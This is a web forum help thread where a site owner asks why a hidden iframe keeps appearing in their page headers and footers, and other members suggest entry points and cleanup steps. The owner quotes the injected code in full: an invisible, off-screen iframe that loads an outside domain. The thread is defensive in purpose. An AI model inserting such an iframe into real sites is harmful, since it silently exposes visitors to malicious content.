Help: Hacker Attack

[khuramyz]

Hi There

There is a mysterious piece of code being added to my websites (header, footer, both).
The code looks like

HTML Code:

<iframe width="480" height="60" style="border: 0px none ; position: relative; top: 0px; left: -500px; opacity: 0;" src="http://profitooltip.biz/blog/feed.html"/>

Can anyone tell me how could this happen as I have searched all my php files and nothing of the sort is there.

Please help ASAP

Kind Regards,

[AnthonySterling]

Have you tried disabling JS in your browser to see if the element is still created? Do you display user input on your site. if so, does any of it contain JS or links to JS?

There's not much anyone can do without seeing your code... or at least a link to the site in question.

[Dan Grossman]

Do you run any scripts on this site which you did not author yourself? Are they not the very latest versions of those scripts? If you answered yes to those questions, that's a likely entry point.

The other is through the whole server being compromised through someone else's account or vulnerable software.

Contact the web host.

[khuramyz]

Hi i have disabled my javascript and the sites are working perfectly.
Nothing is being added

[khuramyz]

@Silver

Send you my url in PM.

[khuramyz]

Actually the sites are on two separate servers. One in UK and other server in Germany.
Also, I have no 3rd party software on my pages except Google Analytics and I have just updated my code but still the problem persists.

[khuramyz]

Ok its something called an IFrame attack.
I cant understand the entry point.
Can you please point at how this could have happened.
Malicious code adds itself to page's footer/header.
But surely i havent given out my FTP details to anyone.
I also add mysql_real_escape_string to all my database insertions.

[AnthonySterling]

@Silver

Send you my url in PM.

I have no PM.

[khuramyz]

Hi Silver

I think i sent it to you in something else.
Well it seems like iframe attack and may have stemmed from xss.
I am checking everything on my own.

[khuramyz]

If you have anything about how iframe attacks generate and how I can prevent them from my site then please share.
Thanks

[lorenw]

google for
another-type-of-iframe-hack-php-exploit

Thats it.

[khuramyz]

Ummm searching. Anyone with personal experience here ?

[crmalibu]

Basically you allowed the hacker to write to your filesystem. Most likely, you have a script somewhere which does something with the filesystem carelessly.

Sitepoint has a web security forum. You should read through some existing threads to get ideas on where and how to look for the hole.

Be aware, the hole could very well be another website hosted on the same shared webserver.

[khuramyz]

I got a Plesk server with every site having its own ftp. Sites dont mingle. But its still on the site.
I asked for apache error logs but nothing there.
I dont know what to do.

[GuruPHP]

There could be a variety of reasons.

Remove that line of code, change your FTP password, see if it still persists.

Change the CHMOD of the file in question and see if it still persists.

Search for Javascript that might have document.createElement("iframe") or document.write("iframe code here") and find out how that code got there.

etc...